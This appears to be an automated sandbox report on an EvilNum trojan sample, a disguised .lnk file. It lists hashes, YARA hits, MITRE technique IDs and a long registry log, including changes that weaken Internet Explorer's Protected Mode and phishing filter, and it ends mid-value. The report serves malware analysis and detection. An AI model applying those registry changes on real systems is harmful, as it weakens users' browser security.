evilnum | 83f1af96b4a15b3b8ec7490de83555000800779d6456ccd017ba02623704f80c

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7-en-20211208
submitted
24-01-2022 04:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2.png.lnk
Size

69KB
MD5

c32820d1eb296d44c56f8430584d9d69
SHA1

a2dbd75dd079594d36509f5ef84a22f869df68cf
SHA256

9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5
SHA512

7a2fde5f81d4b96314340c412c19e1e4d075c6ef9b52969470d46a4bcafd1bf39deeca97d60921d1d27f665bd15e8ba635bf72a24799899566de4d5ad5226780

Score

10^/10

evilnum trojan

Malware Config

Signatures

EvilNum JS Component 3 IoCs

resource	yara_rule
behavioral1/files/0x00070000000130ff-54.dat	evilnum_js
behavioral1/files/0x000600000001330a-55.dat	evilnum_js
behavioral1/files/0x0008000000013292-57.dat	evilnum_js

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum

Deletes itself 1 IoCs

pid	Process
1504	cscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer Automatic Crash Recovery 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery\AutoRecover = "2"	reg.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\PhishingFilter	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 = "1"	reg.exe

Modifies Internet Explorer Protected Mode 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"	reg.exe

Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"	reg.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\VersionHigh = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\Wow64-Revision = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\Wow64-VersionHigh = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395178327"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc9200000000020000000000106600000001000020000000c6109eec91c19aecc2c6128faa2eb70c0718c6855eef47b199fb32a07b862eb2000000000e8000000002000020000000b4f8c6089ccc42b7981897e15a4663e439477484557265292fb42bf6f8348a6f800200003d29251781403c658e9deb5e95f3d830a36d3d4d71252c69641600115f32a9d5fb68bafb9e50b9ed7179f2623c0fed01db8abd5eed6b2cb79ea8cef06853dba0cbc9d22466700c0afaf97193ac8851347ca148d12aee919f6d8c94c31ec47de3b5eaf939ab59e61b1f67ba3fbcdedbd4a6011e1588bf68546d53bd410942378f8c13414d8fe5b3c5c77558d52f5c861474230e9044a704c96443fb24f0075d684478cf623b69d437ac82c5862930f9f6862dfb97009e1d5c149f5db7294f0d1090352fc5b4d7b911c225af7bcdfcc9b6122056a37dac115240a4fbef14381e30d07eaa701576c267318c6ad0095aced279169ec8bc7d4d2ee2ddfa96d0b24027e8972c555ddbe52e6516c8191f2fb72a150de199916417b0b6ba427630d3c150165676888be0f6b80ab15b0eebbfb7603698fa8e6178dd3d70bb25ea18ca0e34c81f707e96f5b751dab053bd5ecc4a1d20029f680877782520d73a88636c5cc046b1acbb7299385a97ac15489241c40a8bb8fb77aa0674baab84aad44942fe0e8ef77ae3bcad0925ddeb5ced63b714b64db621e31af91252a5608250de5e27caef9b54a2f1e3f60d04ddb3b350703a5e04af73395dfdebbc78b035aa417e619af7685867ba4f57f1277cf9289fcf7ad7dbdb7c375add29d8cda1e037a6500814f66c0a2d65dec98e41919cf17c69242b8f62b46f7bab7099c7c63ca34b3ee2dd96bcd7208ceff4d0993114810690119b9ac12ed4179e0cb077c9291bc4c96737b77229ea9375f194ef490daa1e4d5b60acfdbce68f0653da64efefdb9f96c6f1edc2d54def94b59b974d39a09bd0f4d6af2babd7c5555c9ae9b61760ac21bc962d71c00252d026376061a7aedd02b93ca271757e51bdfe7b2db5eb602cc6789b4000000054801f27eb0e999abb486d719a327982cfcf010321152b7632d86ab7b6036a2c802353e6a098259f31de5b484d55081704d527dbf97c498e11799675698ece38	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\Wow64-VendorId = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\IE10RunOncePerInstallCompleted = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc9200000000020000000000106600000001000020000000053b6a6da9b11d30134fdd2279040bd826546fc0fbb3f93e2e6b6f03d3cac10d000000000e8000000002000020000000d191a298bd47a9df61098cfcb12342b19e8cd46cf7ac6c339b130e4879f8c8d080020000b5ea08edbfdb029f9a98147709b2a8fa6484c92c350dd0fbc5bf2cb0f9737caba0291b2a296b1b67b2daa0c4883029d76f0bdff742dbd4d3f12c9dbc48e75d6e0d6a63ddee046b17f97e18c6e08bbd8c1707f11da2617c1943ac656b10ec6031ba0d98295d6912ea8129e37debf9d2a37110a0f8e14029266d16de7f6e4faa8121a5356bde3fc49bcbf2f9588e3700521baa4151116f303fb0cd4a7b682633a2ff0db6ee3f819b9ee4a515306d5c69f8e93220c5bd3da661f4fa96b0256a6c39a381d901ab309917948f427036cce8e577edf4aa62e5928d5912f0ae010cd833706909733847f2cb562901524c2d945449dbdf4cdd35847e5e0fe939c40b50a431dfabc5a924f6c7093bbae96f510d0b7eb44c43fb5a999f7fab7dc4c2e4f1db8df97b774c86bc6cf4df8ae1f6494d04e41e0096ffdc52506bd392cafb6ddbd7afd7d446a1f151603ebb550d052c8f71ef1c5689e8639fa6eca2e01fb71ef3ebe490bffe810796bf7d91e49ae67cf05c6dcd21b59732cd447f52b2761bf04047b2a162aabd3f6b007fba5e0ac33f0f816c40228e4c50c8ed30b9faf1a1a5da8cf4980a0ed4b6c06b8c1785f81872da87c3dc1af915465693e01a14106c6a6af121c9015c05bd8feeca0fcd28b4f8a36881de2616bafbb0132463e12298771ead95b6c40a97d455626a4193cc13f70790f441c628961b3af85039352aeb3d4e194aba5782df4de39d9c94ff5d31d6b2b17ab9b52d02b2a5527fac5921593861daa6471db7414735704e1fcb806580869564b4ea3269c4b771795070c57945ddae00b19baf74d2e37acc2e918dc13e40d2038d37c018ee36913c834f654d8bbed6208d4ef5e03f1277fc92fc4c7383a1e55e0a4dc23c010a13aa69edd58b6ecf494000000069acf125fa1382858def7ce82dbe47f2cea2db0d2f7febaa5d72a23ee44541f1750022fcb757dbd27d861e22f9b5237c51e617a9e1e766d6d95a11c4b9d754c7	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395178327"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\Wow64-VersionLow = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "349764830"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70345204de10d801	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\Wow64-DXFeatureLevel = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{35C31061-7CD1-11EC-8C57-D67CB138B476} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc9200000000020000000000106600000001000020000000d2df7c108b2eb823e68046fe4be94f7b36be943e051e04583d4e14945623a305000000000e80000000020000200000007eeabe6a0ee082b26c3f311b8da80f95da66221bae96b5520f8f170fe87484b180020000082eec63c54ee30da8eabc6ec48dbb89e5d12ea92c1316ec933e551fdd32219e2cca5541006f2732dd81e03867a606f67df68dd412973a97763f35006017945be78881dcfba539ed43ce14a2d0bca7ad8f6933ba0820ff0d4082f0f1d16c6ce071a78a1b381cbefe303816e64c033bfd295f788a79a4d59320c61054960df1aa08ce2d5db1b7933010aa0f2c1a588d66ba7b55dbb06f776edc4401c4b17969159c2dfde8267856d91b9381c87d52dc7cf3ca5610aa9c94f200cd0732602a2e923e38f866986737bd2372dead2d2d9ff3559f1c3d2ce021a79e4b9fdffee06aed5926e289a65f3f73addc46e2b030608a4b41402c9e8db1ba45cfdd2d3927f5eb9c2f776a22d5e5e55acf9b17476b886eedec34367236e980cdd43b4f167a5d16c94c34112171245b1b5f30dec3f633c3f007e2cd93769da52a782724ac57bd492c9b4a450c402438c019ab20865696589303a076d1dee00d93e693059dd621d3bbd880fccf86e461be00f381810a035571b38639e417b796c26a9027bf4a427e36f99d5da63923b6c0062c79d1bf1758c55aa5a83419bf72aca0fca606b272dccda9fc9ea7e8f797c6f882b6ca4be50aea85bc6abc8a5c8e2de24236245ce5541b1fd2ac55b433128512009875edc16c361f832b4e12f968deaf10dd620ee0fb873e7e254b74ea99a25ed444b4debbbe861830a77f6a0a593cc9401356e62629837b64175dd0ae73c43e67e37d990b65c4fe5c1549c5b62c6c49aae97bfb151a0591a18ae8d9ac1c7bb558462eb027fc76b70021445359af4734a0a0c31a11a7f2dc1145118b2d7bc5224ccfecbd13e49a15fd0a66c4a74a6be7bb3420f675a5eb39703ca43aaf96b0f45a653dd1b54add7ff3a5a0778bdf4854f6f32403a5cb400000004bfb4c9bc93327fd116cb7d6fee456d6e56edce2e1a0ca61962d23c367ccf59d8bac58d5b3f05ce08e37f85fa4899c0e2496784140c6b7e8169f49173753ac38	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc920000000002000000000010660000000100002000000062bdde5e132110e2a49254c8d6d36aaf713ad7692dff88e4acb07c6ef100adde000000000e8000000002000020000000907b3b7834aff0236e8cc275fe7959ce546f970f6548cb6fbb84158efd513ee38002000061db828e817653556bb829d10d72e64362b70550b98b123f5764acb878df575dbdf58ecfc2b7f2318ee81c40dd41d4519498bff97192944dc3fb0a4124d3b45f79ebc7635454973af3f2ae3abdca48f4ef2245c5cc837b8c2e4411f8e8e27d9a0d28080e57c5d3263e14349fe3d61894aaf98fbcb175c9815934781d78ce99a1100e62d1502975f6ca76eefcf10a54f78c3e651563f769a887d07188e53cccd160c7169e3f11a4f7ec61366c00cc4154880b56d585a1b726255653bd26fcffde14e5f314f620ce1530d47515ac17235a941c16589423aaa2dd0b9e2503750943b8c5cd842c4f7d055ff77ceed8027c0c5119e2a075c0ca82f1228ffc707d72e62ad0f59357e038cbcd6772dcbc084a84ddfbd5ffe4ee19e4d090a11b920ea36245249b438b7fdb6bb85ba0e1d986d77aaf7befc6ccc132f2486610d796862705acc740a94ff972e0aa83dea0f3f8dbad9b4cdd991756ea9cfddb40f45c5cdd42fdc02180b8ebb9bd4dd23e23bafd3739f7c13d73a68f7db836e6f26a0d680074f5327648addcf26a52ca8f9c97d74da8b4b563d255c9ebf87af1d0542ada3b4010061d05b8410af2fea5b90339ce4fee55c88dee8a0ed3c8562e35594443d6dfe9f68783081370a27dc527716d4f93cf168684fe4cfd60373f2b1b19be7dc6875e0f577a7769efa7d199e1acf6ca2724bf7f4c43f017c555d5ac2a2cd42cccb81dc9cd6f79fca5367d31add1eec1c271785a51443f9dc70da6aa73806ce5b1a7c498d072f067c7e19ac5e6c444af27d467938030191202e2ac35f66170f84b03b5294e63413f826edddb2598a7a6dafbfbc65f698e7db13af73b990fac3c59060594a0b35ac6677d566dab17b58881b4287128717be237c7f43214ab345698304000000043499d16ea1987be0d081e2e61c019f29fa37801447049d2a35ba967f85ee9be894a63383d6145978ea82ab0729582c9be3ca024b1c1ecc2aa8f8aa7f08c3de0	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc9200000000020000000000106600000001000020000000b005e85e4be7486f4e9fb0755bf26814b5e4b36704da8788653ad97289d53fb3000000000e800000000200002000000054059e901544ce8492b889637ea19eb76e18474340edfea55c313e9ba8d033f48002000011931019379e896f968d1181b977a5a7f38e56f705100679a955d15e982647a2c16c41bf5076636223df7aa29af091a1a859b17bef22d496121c02c7112fe7187422786f4a7ec3b508035eaa7b584ee6ccc902ddd6dc5cc86eaec2fdb921b21ba96baad0429e02aff1196854a5f3da2892c5d765d35ee52b642f1b047c18a1d9300b4ded8c46e622fcc87e4492cad1e571ce1788ef9d838c5e409bab03a951e8ad24541ffcd3dd4e18cac813f490e02b050d28ee4682a104ee2ab5dc6b8f6c26274928741e7087ca7cc0c2926e985ffeb7501d992fce137a9d989736639a853bef629677482b5efd7458cd5d6acc8b291b0b732f3bac3f42b326e7866d0c8fbe2c3c3cbae10ef56be375ec05aa19c94649f1343a860daf1449c7c7ebbc182a85dc32a70494c76a91b7e616ae253828af056d68086c314fa189b5f06b3e2d5d3d78f639950cf8411dcdb326c49f437b37e81dce59e5ccae7a42e8e93f653162bd5650f88e61112e41be104cece8d658736d154fe8a84d41741940d3cb262a41e4fe45a82a65dbd30997e82db7b3133c3af79a90980a92c34ad2ce97eb762a87970576dbd0c3661e00329546b7036d239693f4aca21f606b69c0f45297d0dff0548de1ba0d3955dd6d0110de1d5d0f1fbf2592ad3aad923affe36b6e978eebd1c25f97f0a1ea8717f77506ed5fa32df01835a7d4ef9abe7d9550866b1c892568399230790e7a9b8b9b0dac9b554d7fc9f4495397c81625afbee947ccd38f19eb24c93fddad5bd1360f27cc87994f8450c508a1e8e285cd1709623da029e8c578893aa773e3d890116b4a1d5267847f9159828f43438f96f428941d9544541bd5ee4ee212174394bfcc27d90a068defece7987337603785ce64f241b4f7099ca440400000009817665427a5156a9f078defc5006ad2862c0c3fc74aff2b78a796eb0a2f5127a99112c54dc56cc4d81f9d3fdab13ae3007bb731c3feaa55b710bfb63475c0cf	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListLastUpdateTime = "3690964"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc92000000000200000000001066000000010000200000002b7de7ecd74aeaab0b06728beb9838ff7781fb69c5006172770ac64a0af5bad9000000000e80000000020000200000006e6a95a5a6bb8577f1f89c71be63d99f1b78cc4d8301da73d9a767074e48f0d18002000042ec2b3bffb2caf03d84ae427183028972373f4ca242fc5c40663694507d7e2505358353a26e1998778ce908af500054bb3bd424601803152089ecfd0d5e8fdef3fd617c4cb9b0e8d80c79e32e659403d2813060d07bf11a701ff6852e8b8b069a45861351273c3bac22f0159d049d3c4c91ee6b895644ce055dc2e2b6ac85045fc65c8406b9ec36a49cd82825845475994c443e5a68b416eeff25e8b9295eb1b63b3a76caff7bc49f805c8d4ea2942d7c96dbe31f7af8f07765348510842d6ec27631dd0029c8303b3e3528764398cc93786564684ff85566810cf60cecc8b1bdb037d0b8a15ce361acc6e767101c8d693435127189f6bdde2d9dfa27f833bcb953d1924da754e9608e63b0ed32ee89ca4fd050dd1df5bbee4a97842434047ee4a161b31e13d9c6911a13747cb319267fcdd838efe9724f185a54376ee8c23f03c3868b2069d27ca0c2ea003548d283ff9ae703d00c9194340c3f60ef1aa5f91fa4b06b930cd37d9e9d82e02d8cac1391478296ea7f5f85910eb32dbbaecc864b674c348537e6030cb2e6774b4984d6912309d5e6d56b1ae287e22de0fdc658db99c4e17fc26418e1bb0ce88d4c3b6ddfdd56615042e3438b52c5abda8ce51e56228b75f13004365f595fdc4672397b6a30aee42fb7826d41e15d2504a47d24aad24b632199824e32e7d4873463bfcad4b57f8946200ff4b4b0289161e857832ce34fec60e7697bbcc16123ee45d2775daac4e3d40da376fcf73a3938e96abea5f23f6cf26ee2096669e81da3ea566876157b778dbf730bf20f82eb5394d6d37df4775f9d1f62b35a0df5607a1bbc4932da9bb0d56ddad1af39aa5247a37a678f1df996fa7be7b4ac785a6b7cadd9f9369e4e311c4a0140cd9fe6e98b8c99f440000000a1605bb4239578b540f391bf29e13226f19614a477d7846afb795ff14b784798462f6517062de85bf50918e48d93fa62fa5f57536e9a734590094b6311c40ec7	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\Wow64-DeviceId = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU\Wow64-SubSysId = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc92000000000200000000001066000000010000200000004b19001f55fcc5a50dfca0ab60b87e0c53e3974ec4888e830d10e47766184474000000000e80000000020000200000004dddd9a0594617f42876a1f31ffbf59b08ab26e40b5dd2d01619a9d1d3dc658380020000b81ed44ae52903cc92f9af434f9e1e150dc3ea5e57ae0b823a43bcbaeacea85ab71b34cb4fcfa3f4aad9e2409a51c55bf49968a7989fac0f2ca6da46fc01970eb78c1c9a5bb33d05dc5be96d067478e560455f2afa4e1a80f789e672923fb68da1363de6b781c824bba465fbd07f6dccb66ef9668ec371d1d89806dcb163bf57eecc7d8db3a47ff34c55a07fa0fd547fa328d56ee912ecbb53c11ef1317b1ad11a6df46fa064d8341e1c2d9dd32691ed70a14ed2f5c5c10e8e4e8cbfb4866f8ee94fc7cc859054ce05edd268f57d697e50b1dd19ca50027a7c8a9e37f01548ceedbc5b6d4eee69ed3f82e41d6cad9745f0f272ad75a606f51a22b7c6e8f2cb188e8379a7655a8ee32cf0dab98e8944e0b647c0448ccf3187e782ee98612de3f9099a6b2d4c3ecde0161eb53b268953eaf8a5826764c728a81ec9fdb384c3d817674204638399d60fcee97f1c41f82533b7924b5dfc4ef781196c533b63cfc2f1c7a8b59634e778757c396096ce347702c323d5e2ac9d896778ffdce2856e9469e41fb762be2e5c5cf0b71ad80878ee12f699c24e097bae7592067c46f1c743bb0f302fd36308c22d22f403211717a89e4d7578b1e60001de10f46c4b6ef3a939a29cfffbd70b5db1209daba9ae2a7f014143c6f14858dc5aeebc4fc33154278ac7bc1cdcbf811490aa959eb5c2820de1543e2967297ba78d06a52af1f42629bf9594bff64d65745c150f9e83ebf22d7af37bb3c959fcc37ebfd94fc87ef616a762fbdee2ce959ca26262a787e897a4f436270801397909753ce9d5abfb1cf22361def4c0569c4abb345a42c7fe6d1b4277197404a4c7e5f0b4d12117b1ae3d738a1c6775f60aff274e51b855c0e5d6aa1b0d8f74985a1ef1dad9b5cdc7f2ef2b4000000031e3721aed8ffa6290973aea329350dca73a213aa0d1e94dafedbb9f85e0eb9e8e97d6c813162aeabb32f6a939a9396890eca37e2da6b01329f2762c3600c35a	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc92000000000200000000001066000000010000200000008e2265002b416d9c8010970b0e5befb4c1dbb0479b50a643c231e63370a3dfe2000000000e800000000200002000000081338ec93440f71cede754363135c0ed75761f18a7c20d573f2585f1be0c57e98002000018f3f17c458301e0d926204a7a3580392411a5e02aa6951e03716287ecc15cd9fd4a936039974c4a1ef4fd0d99988b1fc697211472f8f2f713e151818739cf385f303313a29d6938c5e946bc2875ca202220fb3745adcb41dd51c7ad5cb999668539f87f0462c95c4d2cef51e19990a8a07cda5187a859261c1efdf7c6c9fb64031065c3acf37d7379af53e7a1dc09f35bfa43dc707ff773299ebba3b5590eb4935dda7d817765d42fdc30f39654e2d324ff6406de2c5c58df0ec045c6b60b00d8b20bf9b0f0a4923c327261219eccc9b3418f1b03aa49fb9fe381fef2172122e333e736113fbc2550a73689613241f5413c6ead74acc9b22c222306c68d6ef4198f8708df124577fc6db3799caa5925c927b4297f4ab7472d10fc268c6c93f5bd947d62566162316554fa714b23154acb017ca735bb8b05ac98ec2d554bce699f2d102faaa73f158a0cbdd739507956ff27fd6b917278509dcd7d1faa1218129a76dc8c1d8d1a93a93296c72a76dbe13232f66322857e5f381feb6b77fc1de1d2e91ef2995494f07fe37c5cb5d9c61e66ab26f16cf10334c5e62bce38e62a43d2aa253e1542d821c76cce3ee454f5acad32fbaa85712c8c367633b5eefb9a1aec038fd14057fc67b74be3936dc22481ccc92f9983e2d0d62960680e3f5e72820ac9307afb95c41de6cce64a2ff1d83d97bf1608046a6e3f4205358e0edf6d50c3d95fbb93dc8d0ad908dffa464070043883dc815096c314d14edec2ed82ca1c1f54e8684793db4eb3ee59d37de44121578285ffd879065399b6114453330fbad0ac03e5382c26bc2ed8938e001e9da73e01c360cb557a25d667346c054477ef65cdf2c4fc3ed86e98156c3d03997dab8b637125ef78aa4a9d98bd6ddebdf1ed40000000061336b2775828f2be15acb8142315565020f681e28f8b47f89ebbc559e708a7bbb1a304d38e872ab1ec9fc3f63351754ce4cacc9f4e3cf3d46b57596e78a40d	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc9200000000020000000000106600000001000020000000a7918da09d56bf9aa310f4c52253375681c9bcfc7701a79f76f89e6f1a8891cb000000000e800000000200002000000002c8e47402a88d6cdc59b97cee7a57fa81399860dee059c66b8b0ba4afe614cb800200007fa1c8fc6fbb4f1db519342964d50b6414529909dc6e5c21355b92c9dd569b5a7452acd0de9959e9dc9819e1abfc4fa76b3eda88c3ed81ba82990ec4b05f004f7b99bd3ccf9236017bf8a7864397efe9eec5e3e88f37746b1d6404ca897bbf19319b73de5cc365791f1c70456c6aebdbbd5a8df20593cb9518e4dd0794ded8da1738a16c4f8baaecd864600669a1e0cc18d23d242bdc33336d6d24c31df3090d3a6ffa99ef6656a120c3719992ecb6080ea62cddba5ecfa8caa216b31683e94412ed9334ea77fe460c0c6ee05631aeef81951be07100eb0f5adc706eddb3f24f8be87cc9eb0c401bf2eab00d4b13253d5e61a892db30eefc5445eb915ceba9cf1c7f98f738ebbe7d3b4b691cacd2e2a0cd52b4077ab1c98beeca510bb82b62f2dab038deb430fc6e3471157ca79e8a7ea1d0c7442ef7ae93bcbc8029feff5970abf9c80f